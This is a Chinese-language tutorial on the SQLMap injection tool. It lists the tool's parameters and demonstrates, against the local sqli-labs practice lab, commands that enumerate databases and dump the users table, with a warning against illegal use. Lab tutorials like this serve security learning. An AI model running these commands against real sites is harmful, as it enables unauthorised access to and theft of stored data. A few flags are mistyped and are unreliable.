SQLMap工具使用

一、SQLMap介绍

SQLMap 是一款强大的开源自动化 SQL 注入工具，用于检测和利用 Web 应用程序中的 SQL 注入漏洞。其工作原理是SQLMap 通过向目标 URL 发送带有特殊构造的 SQL 语句的请求，观察目标应用程序的响应，来判断是否存在 SQL 注入漏洞。例如，它会尝试在 URL 参数中添加单引号、注释符号等特殊字符，观察应用程序是否返回异常信息。如果发现存在漏洞，SQLMap 会根据漏洞类型和目标数据库的特点，构造合适的 SQL 注入语句，以获取所需的信息或执行命令。例如，通过联合查询注入，可以将恶意查询与原查询合并，从数据库中获取额外的数据。

SQLMap工具地址：

官方网站：sqlmap: automatic SQL injection and database takeover toolhttps://sqlmap.org/

GitHub项目地址：https://github.com/sqlmapproject/sqlmap

二、SQLMap使用前言

在使用SQLMap这款工具前，需提前安装好python编译工具，本次使用结合sqli-labs-master靶场进行演示

注意：在SQLMap安装目录下使用，如

红色框住部分输入cmd，然后点击回车，进入命令行界面

三、SQLMap基本参数

可输入sqlmap.py --help 或 sqlmap/py -h 进行指令查看

-d        指定直接数据库连接得连接字符串，直接连接到数据库。
-u        指定URL目标
-I        从Burp或WebScarab代理得日志中解析目标
-m        扫描文本文件中给出得多个目标，批量扫描
-r        从文本中加载HTTP请求。用 * 标记注入位置
-g        将Google Dork得结果作为目标URLh

-a                获取所有信息
-current-user    获取DBMS当前用户
--current-db     获取DBMS当前数据库
--hostname        获取DBMS当前主机名
--is-dba        检测当前用户是否为管理员用户
--users        查询DBMS用户
--passwords    查询DBMS用户密码hash
--dbs            查询DBMS数据库
--tables        查询DBMS数据库中得表
--columns        查询DBMS数据库表得列名
--dump            查询转储DBMS数据库表
--dump-all        转储DBMS所有数据库表
-D db_name        指定要求枚举的DBMS数据库名
-T table_name    指定要枚举得DBMS表
-C column_name    指定要枚举得DBMS列
--batch        从不询问用户输入，使用所有默认配置

常用语法：

查看所有数据库：python sqlmap.py -u “url地址/?id=1” --dbs --batch

查看某个数据库所有表名：python sqlmap.py -u "URL地址" -D 数据库名 --tables

查看某个数据库下某张表下所有字段名：python sqlmap.py -u "URL地址" -D 数据库 -T 表名 --columns

四、迈入实践，以sqli-labs-master靶场第一关为例：

1、打开sqli-labs-master中第一关Less-1

2、输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs

3、成功获取所有数据库库名

4、获取数据库security下所有的表名

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables

5、获取数据库security下users表名下所有字段名

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --columns

6、获取数据库security下users表名下所有字段名的数据

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --dump

注：--dump命令请谨慎使用，切勿违法使用，使用--dump参数后，将会在计算机本地生成一个.csv表格数据存储，里面包含某个数据库某张表下所有字段的具体内容

五、拓展使用，以sqli-labs-master靶场为例子：

查询当前数据库：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db

查询当前数据库用户：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user

查询当前数据库版本信息：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -banner

那么SQLMap这款工具简单介绍这里，SQLMap工具十分强大，以上只是部分用法，更多详细用法可结合官方操作文档去使用。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/901963.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！